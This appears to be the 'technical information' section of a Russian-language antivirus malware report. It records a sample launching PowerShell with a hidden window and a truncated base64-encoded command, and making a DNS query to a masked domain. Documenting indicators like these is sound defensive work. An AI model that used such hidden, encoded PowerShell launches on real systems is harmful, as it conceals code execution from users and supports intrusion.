Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADkANQB9AHsANAAyAH0AewAyAH0AewA0ADYAfQB7ADAAfQB7ADMANAB9AHsAOAAxAH0AewA0ADgAfQB7ADQAMwB9AHsAMgAyAH0AewAyADAAfQB7ADQAOQB9AHsANgA2AH0AewAxADkAfQB7ADIAOQB9AHsANA...
- DNS ASK we####ddqw981.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WinDowsTyle hidden -e KAAoACgAIgB7ADkANQB9AHsANAAyAH0AewAyAH0AewA0ADYAfQB7ADAAfQB7ADMANAB9AHsAOAAxAH0AewA0ADgAfQB7ADQAMwB9AHsAMgAyAH0AewAyADAAfQB7ADQAOQB9AHsANgA2AH0AewAxADkAfQB7ADIAOQB9AHsANA...' (со скрытым окном)